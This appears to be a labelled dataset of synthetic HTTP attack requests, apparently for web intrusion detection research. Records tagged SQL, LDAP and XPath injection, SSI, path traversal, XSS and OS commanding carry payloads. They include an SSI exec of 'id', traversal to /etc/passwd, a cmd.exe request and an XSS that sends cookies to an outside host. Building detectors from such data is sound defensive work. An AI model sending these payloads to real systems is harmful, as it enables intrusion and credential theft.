If-Match: "DhpxkkafM-F@izMmt6"
If-None-Match: "Q4qWxhbhTfP@LuL"
If-Range: "qatT0qY75NlDv7c1"
Max-Forwards: 1
MIME-Version: 1.4
Pragma: xae=dqiye
Proxy-Authorization: Digest nonce
Authorization: NTLM Y2VyMGFvaXgxUzZ0cGk1OWhoN3l0U25zSW45ZUlkZWh3dk90
Range: -55067
Referer: http://www.aoctun.ch/l2eyhol/8hveae/ietna.swf
TE: trailers,gzip
User-Agent: hi7ehewedeid
UA-Disp: 9875,2381,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: twtfr/1.9 56.196.180.112, FTP/4.9 www.eocUu.gif, oDanMa/5.8 178.12.163.106
Transfer-Encoding: Cena80; tgpo=pasliuk
Upgrade: ovle/8.4, aroHm/4.2
Warning: 386 www.xasZe.html "sgRjdihtd" 
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39136
Start - Id: 50103
class: XPathInjection
PUT /yrmfimsu5ewetoae5rha/ofhMP021JQRcFPGwl7/thijh8ree5mbaetttu/kiiixjaLihn/TZfdb/.nfq1QnrSWRR/f_b580aS4@.php? HTTP/1.1
Content-Length: 157
Content-Language: s5Uetc
Content-Encoding: identity
Content-Location: http://senRehhi.fr/hatt.wmn
Content-MD5: ZXIycHNzdG5pb2hhNGVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Dec 06 01:20:11 CET
Last-Modified: Sun, 22 Apr 07 07:36:11 UTC
Host: 53.104.37.97:4
Connection: keep-alive
Accept: application/x-tar;q=0.4, application/x-tar, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 154.185.255.237
Cookie: imgZyN9ktdFdrop0p=71983    or     count(path/child::node()[position()=((i+j+k+l+1)]  |  path/child::*()[position()=(k+1)])=1     or   18956=
Cookie2: $Version="14"
Date: Tue, 07 Dec 04 16:07:50 UTC
ETag: "PlgwVVj7oo0ezHxa-"
Expect: 100-continue
From: haTsx@Tdios0mS.be
If-Modified-Since: Tue, 11 Dec 07 06:25:36 UTC
If-Unmodified-Since: Thu, 22 Jan 04 06:46:21 GMT
If-Match: "Hg7RYRAyctZmxZV6vj"
If-None-Match: *
If-Range: *
Max-Forwards: 6
Pragma: ce3qhgoo=3eslpasy
Proxy-Authorization: Basic enRtMGw6OGVoZXRw
Authorization: Digest cnonce="hamrttAs"
Range: 39-707535,719-
Referer: http://fdtn.be/letaaeru.doc
TE: trailers,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 8.2; nu-9a; rv:9.1.1) Gecko/50321409
UA-CPU: x86
UA-Disp: 7455,9051,16
UA-Color: color8
UA-Pixels: 465x962
Via: 1.1 76.167.36.157, 9.0 www.icnn.htm:9342, 4.9 186.70.180.246:134
Transfer-Encoding: gzip
Warning: 335 www.fy9k.png "loei" 
X-Forwarded-For: 64.186.118.225
X-Serial-Number: 8805837384319
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

rFasQhel5Lncqm=-qtfys&6ex9otr=99446177&e5Lotu=0743817&Bi@QRweD4=osk el@aN&pbsohrmko0isn=0136&o7div9havingElink4Cq9=096&eI=40004&Eeerbgy=ubam&Bf@TA=71842752

End - Id: 50103
Start - Id: 35408
class: SqlInjection
GET /z6sldgdec9/twt6bmvtodqazx207xia/rtJOi/QG9@L.qC9VF2y/6Bchildmetaw5/jI/e1imwaAjn0Bp/fv88hT1tQ.js?7Iclospuohas=%5BCdma%7Cdlogts&tdceKrstgv=oKw7&Lylkbiltnaal2e=799526199&bS=99&rnen40oenp=d7dtobfnitycfput&5PPUPB3O=owS%40VWtZexZ7&gTQTG=ergy&ehsihaeahatt=feef%28&girifePlanpoxr=bUrltdL7v&nr0tbadioawAs68=fce&Poy1vataAdeeogM=%27++OR+++%27%27++%3D+++%27 HTTP/1.1
Host: 249.142.72.188
Connection: otAet
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, identity, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 67.105.71.5
Cookie: pttenn=8
Cookie2: $Version="1"
Date: Mon, 24 Mar 08 18:01:09 CET
ETag: W/"xjhXd_c7iQOU03vuzK4B"
Expect: 100-continue
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Oct 04 15:27:40 UTC
Max-Forwards: 412
MIME-Version: 4.3
Pragma: toiumBfi='f2i'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM b05ob241ZHRldWllYWVuM1RlZHJyNXJxdHU3VHNicmpuaHdUbG5paW5ydWxyM2k=
Range: -67
Referer: http://aoeu.net/stsza.mdb
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/3.9 (compatible; 87nerrjot; Linux i586; ctdodlimaf; t0Hc)
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 1.0 www.lbur.html, e5soa2/7.9 www.fo4k2w.htm
Transfer-Encoding: gzip
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35408
Start - Id: 39867
class: SSI
GET /5dl_WfdocumenttTI/zallIwgetpositionP9_i9/fes5ila/wQM0ARHE/thaTa/36b/i4XL2mjq3/ieatw/jeqQ3ViSscgg/eWXtOgMMZVsWoo2/i7QM.shtml?KGLuQkqRlibtwopt=bSpnS&ehsmsrtTrnotiw=+++&sss0t0p=6983709&fOdm=e_4kwPmD8&to4nehdon=sock_stream HTTP/1.1
Host: www.uEjj.uk
Connection: close
Accept: image/jpeg;q=0.6, audio/*;q=0.9, text/*;q=0.9
Accept-Charset: windows-1251;q=0.4, windows-1257;q=0.7, iso-8859-8-i, x-mac-ce, windows-1252;q=0.6
Accept-Encoding: identity;q=0.0, gzip, compress;q=0.3
Accept-Language: jruEs-nn
Cache-Control: only-if-cached
Client-ip: 148.227.129.30
Cookie: ahi2l6089=oN cH ldtn+Rmu;adminIxvJHXK=ezP;ehirn=73
Cookie2: $Version="32"
Date: Sat, 05 Jun 04 03:27:19 UTC
ETag: "YiIMsANeiSV3D4fxFx8"
Expect: 100-continue
If-Modified-Since: Fri, 25 Apr 08 24:54:57 GMT
If-Unmodified-Since: Fri, 03 Mar 06 06:40:58 CET
If-Match: "8Z_Zw.4@KHxQd2u7Va8"
If-None-Match: "7uGP4Wbo5qOOdM7.7_b"
If-Range: "dJi8haicSI1lPsKeU7"
Max-Forwards: 9
Pragma: drd='uJ'
Proxy-Authorization: NTLM ZW5zaThjY2RlZGx6Z0llaHBsaFN3MnJpbmhjdHRuaW5lZXl0cmhoaGg=
Authorization: Basic QWlFb3JhOmVjYTNo
Range: -18262
Referer: /x2un/ewzrxt/ac7hb6a/yagst7r/hdoaSh.php3
TE: trailers
Trailer: If-Match
User-Agent: <!    #<!--    #exec  cmd="id"-->
UA-Disp: 991,4045,16
UA-OS: Win98
Via: wdiidu/8.4 www.eIhIn.tiff, HTTP/5.7 www.diod.shtml, FTP/3.6 168.184.182.113
Transfer-Encoding: compress
Warning: 792 82.82.12.49 "ieyi" 
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 14193348040623
----: ---------------------------------

null

End - Id: 39867
Start - Id: 46377
class: PathTransversal
GET /IWlAE-F/ag5acnmnu/nnueh5taoxya/pWozjY/l@zi8Bo6_5/GJQ2m.mIC3O/na/eWBmShGier7Wzy2fOgGz.mspx?gCxgkUhSUMMG=13956642&nodTomYE=94d&ftsczs6ijntjo=tconnectk&6zefae2rjtdqR=3036794448&otannehdHrtxwAE=9q+dva&wr5uhctA=%40ttweeh&saasnn7=naatodesvnih&obg9rRzyiethhtr=upftpmuxU+eh+&rnsnwfd5stuetot=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&athei=hkltgeid1unttex2&aAm6t5c0t=88101966&-73AieXx=%5Bi HTTP/1.1
Host: www.Teyhg.fr
Connection: close
Accept: application/zip, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, identity;q=0.9, gzip, compress
Accept-Language: *
Cache-Control: max-age=90
Client-ip: 86.247.207.18
Cookie: Rhhc9htT=rrnfee
Cookie2: $Version="86"
Date: Sun, 02 Sep 07 14:01:48 CET
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Sun, 15 Mar 09 21:28:33 CET
If-Match: "pPmgDTJMULzDHOVZDTL"
If-None-Match: *
If-Range: Sun, 29 Aug 04 02:20:03 UTC
Max-Forwards: 8
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: eIymk ItnthXy=ursdHCat
Range: 2-1818,846125-
Referer: http://www.ttes.com/tnattu/uohwobd.js
TE: deflate
Trailer: Date
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 9.3; rh-na; rv:4.5.7) Gecko/36784964
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: compress
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46377
Start - Id: 35277
class: SqlInjection
GET /hos/pnqoe/ned@dn_8Fa.o7/e.teWL/rnullPI9K_uscriptHSnk/rqdVPXx4cZLjr8T/i4RMmA.3s.ss.nsf?qu=nArttazipRitu&ncait6a9rC=lcge7im%28+&5eeObEdi=1584378378&6tiam=%27itxr&empatasO=+h%7E&LEKPV=y%28%2Bb%27&YWjwdULkm=721&H0seo=2085&Q4GT9ii@=n.t&p9aSnnb=fNmLopenemtt+aM&enhYQT.QsZ=or++++0%3C%3E%28select++count%28*%29++from+++++us2ytbs%29&XPc4=hX-e&ee=2norjnIruxp_ HTTP/1.1
Host: 179.101.28.116
Connection: close
Accept: text/plain;q=0.0, application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 155.132.155.102
Cookie: dteduioI=06706;rghynorist8=21744;stiur8s=bn3H
Cookie2: $Version="4"
Date: Wed, 29 Aug 07 10:13:18 CET
ETag: W/"K-NkvRrlLf6gBjMEc3V"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 23 Oct 05 10:13:04 CET
If-Unmodified-Since: Fri, 11 Jul 08 13:06:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 03 May 09 14:11:35 CET
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ajr='elrosis7'
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://www.fflis.cz/rd7eoa/8ebsee/9ii5lty.sh
TE: trailers
Trailer: Proxy-Authorization
User-Agent: nAaia/2.9
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: compress
Upgrade: caha/7.7
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35277
Start - Id: 37414
class: LdapInjection
GET /brh9otit5sihse3n3o8w/aqe/7execy4pr.jpeg?atfIetnpk7ngo0e=sbiol HTTP/1.0
Host: www.Tnie.ch
Connection: olcti
Accept: audio/basic;q=0.2, audio/x-wav, video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ecthemko-eql;q=0.8, heeee-sn5hsl;q=0.5, ae6ra2r6-ra;q=0.3, ttlrcmpi-HddeeefI, u-oIonp4
Cache-Control: min-fresh=55511
Client-ip: 188.193.125.170
Cookie: xb7cos=rn;eaesn=aJS9@9bZsbc;xb89ArwvqVizmN=horhssshssvwnodep|;eOlorigetrote=nbonx)(&(objectClass   =   oRvS*);tuapliM=a)metaAte84oNpLls)6ca;oxznonalb=279
Cookie2: $Version="85"
Date: Wed, 17 Oct 07 13:38:07 CET
ETag: "hykp_z-@oEb2W0RoC9fz"
Expect: 100-continue
From: alaHcor@ktljooA.cz
If-Modified-Since: Thu, 20 Apr 06 04:22:37 CET
If-Unmodified-Since: Mon, 13 Jul 09 03:07:54 CET
If-Match: "aYsb@uE75Bq@FKGdq"
If-None-Match: "cBv_uLX_eU_gUOy7"
If-Range: Thu, 02 Nov 06 09:57:45 UTC
Max-Forwards: 1268
MIME-Version: 1.4
Pragma: tpstoc='n'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: NTLM ZGFoZDVjamhhNnRlaWVtaEVhZGVybGFzYldlaG5sczZnVDZlaW50YTho
Range: 747728-0693
Referer: http://roFiteoV.net/abhh/cirk/nrjb/Szitnspn/al3ob.swf
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Ayamp (k7iXjZW)
UA-CPU: Sparc
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 516x5876
Via: 9.7 www.et6ad.gif
Transfer-Encoding: compress
Upgrade: inCnt/4.0, wfn/1.0
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 63.251.171.158
X-Serial-Number: 14452440707271
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37414
Start - Id: 46400
class: PathTransversal
GET /lX/sk/DCwp-4_G/rlhgijy6n.js?8GSXXf=dcd1sn%24Ea1loat&oesklE=%7Cpeslikeyadr%5Clv&VlXas=bgsoundnelocationlknTr%29te&9tsfsayoszLe=Uehaving&dsraeh8jN=0&.P3D@EupdateqMu7L=9557645&ky2l=4slgni&svr=%2Fetc%2Fpasswd&ssarnlcNof=924356&d3lnt0=37 HTTP/1.0
Host: www.tigte1esei.com
Connection: close
Accept: application/zip;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: l='t'
Client-ip: 43.64.25.189
Cookie: chefhUed=Ehs>5ui=net -sdachild6da;EuG=rlocationeN;eMXaso8lonq6sn=thrlah];OL;mEmawoN=zecoli;t
Cookie2: $Version="4"
Date: Fri, 05 Aug 05 21:53:33 GMT
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Sat, 02 Jul 05 19:20:23 GMT
If-Unmodified-Since: Tue, 04 Jan 05 10:40:27 GMT
If-Match: "Y23R4yMOFdEtZOJIG"
If-None-Match: "iysPBxTwY.87qTgwl.."
If-Range: *
Max-Forwards: 249
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest response="9eABA3a83fa522094D696FccACC995CA"
Range: 0-,-1441,-234089
Referer: http://swtethex.biz/snnsrot/yilmt/lcope/vBnAm.dll
TE: trailers
Trailer: TE
User-Agent: swieneoeceieisop
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46400
Start - Id: 47378
class: XSS
GET /oDCAPBEo.KN6eb83/ey/aHXqeiDIWX7J/i_AusEx1-fG6/a@U/6tesP/9_4zvT1Y/kpTjnAi/hjEoHshisau/eylI/iiCfAlh4nrrsjni9emva.swf?c2maieins3c=ps&0kcheeo=7+replace%3Ed3uD&PT=us&psMevalsexec=So&0n67acrlhaxep=eu7NtAr2T_&rts=a0KSsG.S&kieeernetee=ioyae&iedtoaCS1=%3Clink++++rel++%3D+++%22+stylesheet+++++%22++++href+++%3D++++%22+++++javascript%3A+++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.rionli.com%2Fcgi-bin%2Fnsiest.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&rS912VvlsYk=4530088932&mihcbg=%5Be%24eao1n%2Baaa&mmrdkaean5udhn=Soxaeahsatle HTTP/1.1
Host: 77.190.97.155
Connection: close
Accept: application/*, video/mpeg;q=0.8, application/*
Accept-Charset: windows-1252, iso-2022-jp, cp-932;q=0.1, euc-tw, x-mac-greek;q=0.1
Accept-Encoding: *
Accept-Language: h-w;q=0.9, Zgrrm-nat, iser-rm1n, b-olllgoo, thx-matrse
Cache-Control: no-cache
Client-ip: 246.85.69.97
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="46"
Date: Sun, 09 Dec 07 16:28:36 UTC
ETag: "ZnNm.cJpRx1VT2moZ"
Expect: es3hci
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sat, 22 May 04 13:12:25 UTC
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3091
MIME-Version: 2.6
Pragma: c='ndhmat'
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: NTLM MzBjYXB0d2FpMmh0ZWx0QXVucXM3aDlXdHJ0YU91ZWF0aFJjZXNhb3VzZWU=
Range: 35419-,75138-2674,165640-
Referer: /thlk.js
TE: chunked;q=0.1,trailers,gzip;q=0.3
Trailer: Expect
User-Agent: mpSnkWyG http://www.YjtrprO.ch
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 2.3 www.Wenw.jpeg, 9.4 247.107.42.78
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47378
Start - Id: 43887
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 93.137.147.70:90
Connection: close
Accept: audio/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: toOt-nJgg;q=0.7, qltM-t0ls, eislr-A
Cache-Control: max-age=1
Client-ip: 182.179.139.200
Cookie: ssgycclngdgClzl=aRTLRn
Cookie2: $Version="62"
Date: Tue, 25 Jul 06 21:02:46 GMT
ETag: W/"skpGjE1mkN7gge52"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: *
If-Range: "csX.cEIoKRjMNB8R"
Max-Forwards: 6
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic cjh0b2JoTDpOaXRp
Range: 51069-
Referer: /kgadiod/iRt7/iplf9/tiwpL.exe
TE: chunked,gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/1.3 (compatible; Konqueror/4.0; Linux i386; iiIsfna; aevl)
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43887
Start - Id: 36974
class: LdapInjection
GET /qnusloaYBNux/yTesa7vk/-RoMusrm1Sjup/ieeemusl1nabTeqi/u0xYPcp/os.qj2Erm-.qk2PDVuOn/tapoBsoic8hikRh03nie/nh/lyf@kP7jplBP0kngV.css?1JV4A4Hhttpssy=y74uu&ceseiaaiant=%29+%28+%7C++%28displayName%3Dhad*%29%28name+++%3D+had*++%29%28+++mail%3Dhad*+++%29&f2sksennhbym=0mo%3Adropr&T5RGlP8=3&onH=TedtlinkCrsKenk2&fTinputCinputTcincludeLOk=67794 HTTP/1.0
Host: 36.163.7.49
Connection: idt10eb
Accept: application/*;q=0.4
Accept-Charset: euc-cn, windows-1253, shift_jis, windows-1255
Accept-Encoding: 
Accept-Language: 3mb-ls9noisT, 2-n
Cache-Control: no-store
Client-ip: 239.152.191.189
Cookie: s5sess1yhoteh=h_7Usfd2
Cookie2: $Version="595"
Date: Mon, 19 Oct 09 22:57:22 CET
ETag: W/"Rz.sIjbkpT89WYaN3o"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Sun, 02 Dec 07 05:19:42 CET
If-Unmodified-Since: Tue, 09 Nov 04 08:50:04 UTC
If-Match: *
If-None-Match: *
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 82
MIME-Version: 3.4
Pragma: ger6ay='4e'
Proxy-Authorization: Basic aGlsTmUwOmxzdG9zZmU=
Authorization: nertct ihrdp=xtodlihe
Range: 84-,-422477,1197-5319
Referer: /enmdis/ic2at/uafl/Aae3nd/6rulohtu.doc
TE: gzip
Trailer: Max-Forwards
User-Agent: eali (0ss@8m6ic; oi7q4z; t@Iyst; dpmaA_; 0CwEG9)
UA-CPU: StrongARM
UA-Disp: 2036,1499,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: eel4bi; eesNp=0tGeir
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: -----------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 36974
Start - Id: 49619
class: XPathInjection
GET /i1rirBiqasokzurOnlyb/eeeaodNai8reueitel/u5/fYDZ1bnperlivarpositionhM.asmx?EasnI=0Oo_ARkV0r&ung=aed2edheceoti&4n=%5CDt%5C%27sn&eduIwctpFa=521+or+1%3C+++apbbmt%2Fe%2Fth%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D01%5D+++++or+53223%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&@6GbMHe=Blh&NQre86=2847446&ee4ssd=lr1a2eqReojn3oe&sPoo=c%3Ft+O+h8ahtpass HTTP/1.1
Host: www.etVigmmk.org
Connection: Yiiid1ex
Accept: */*
Accept-Charset: x-mac-arabic, windows-1255;q=0.3, x-mac-roman;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=428
Client-ip: 230.240.19.221
Cookie: ejEH1Khttps=mcetf;SY.JJESw_pYu=bodycopy>d@;dia0lnywssE2ah=oo|;hiyF5iw=nqaw6nP-KBp;5ae=86otee;ee=DerssjdDo2ioAihtr
Cookie2: $Version="4"
Date: Thu, 06 Oct 05 05:20:25 UTC
ETag: "FQUYY8_.5L@nP2cP"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Thu, 14 May 09 03:59:41 UTC
If-Unmodified-Since: Tue, 12 Jan 10 12:09:52 GMT
If-Match: *
If-None-Match: *
If-Range: "9E2RCRc4yeL3usjC-bn"
Max-Forwards: 507
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: sfrpr ieWiomau=srgl
Range: -18,783752-
Referer: http://eaea3rf.de/sIed/gry3/Remoaaoa.cgi
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: ilUfhX http://www.oodte.com
UA-CPU: Sparc
UA-Disp: 198,0683,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 1.4 www.biek.tiff:3757, 2.6 www.tilkuh.html, HTTP/4.8 101.17.35.140
Transfer-Encoding: compress
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49619
Start - Id: 35547
class: XPathInjection
POST /hevats/T3.pl? HTTP/1.1
Content-Length: 369
Content-Language: x,sltg,yz
Content-Encoding: gzip
Content-Location: /Notn/b6staey/Tidmxten/scwbhe/3teu6lc.jsp
Content-MD5: ZHFSZ2V0ZWlzZWVvaGE3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Jul 06 14:07:23 GMT
Last-Modified: Thu, 12 Nov 09 20:53:59 UTC
Host: 146.1.180.65:80
Connection: zson8Lno
Accept: */*
Accept-Charset: x-mac-ce;q=0.5, cp-936;q=0.4
Accept-Encoding: 
Accept-Language: ams5tso-dmm
Cache-Control: no-cache
Client-ip: 20.198.192.186
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sat, 11 Aug 07 18:55:27 UTC
ETag: W/"NVeYXAYynVJ6NfI.SKRd"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Wed, 12 Aug 09 04:37:38 CET
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: *
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: *
Max-Forwards: 94
MIME-Version: 7.5
Pragma: kKhM='d'
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest qop=bhejopd
Range: -15,703-20624,9752-7
Referer: http://www.hsmcr.org/oeO0se/aemi.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (compatible; MSIE 8.3; Open BSD i386; gxvgoCTbdu; hiRex; 6nohoierac)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 502x021
Via: 3.7 25.146.208.57, HTTP/4.2 www.2fsopY.png
Transfer-Encoding: compress
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IP7s94dJNX=6uOiDHf6NkMo&lndf=Arb+null+eTer7s82xmD0&Qr2aotUUedWtnK=ne0d4emdnaco0p&we5=eens&qoalaef8zn=32269&dyg=aRahnstf&q7u=Si4scriptbho%2Fo+%2B+cn5noac7&q%uwNgNNmetaN=%28i++%3C+++count%28nE%2Fchild%3A%3Atext%28%29%29+and++j+%3C+++count%28rk%2Fchild%3A%3Acomment%28%29%29+++and+k++%3C+++count%28dr3%2Fchild%3A%3A*%29+++%29&lNeaBeirewfceo=ih1t9&mqatEtaitubet=hsBot1xml3n

End - Id: 35547
Start - Id: 38809
class: LdapInjection
GET /prUpBHiThgr/select9NselectO/atw075o@L7E6UcNH8Uj/r5nfse2mk/rEiirEpIw/aClb/0@GEj8TwZJyTmQT7@/e_/zai/leeefsmt/E3snqI0/injmohlniyebon.nsf?5go1tadeq=868%29%28%26%28objectClass%3Do1vh%29%28%7C%28sn++%3D+sO%29%28cn%3Dirfr++J*%29%29&a8r1t5sacIaat0=81793&emsnsesui=45vllomamaeo4e&ybnetFe6t=hnohaving50s&rcpuXqulEIeRof=98&pnyusma=4499&U.hKT=06&lorr=031&2ed=yTT4 HTTP/1.1
Host: 200.154.88.90
Connection: segr
Accept: audio/x-wav
Accept-Charset: x-mac-korean;q=0.8
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: oyoh6='OBSme'
Client-ip: 103.147.207.153
Cookie: td2aoxOer=847
Cookie2: $Version="19"
Date: Thu, 22 Feb 07 14:02:36 CET
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: huUre@isis.com
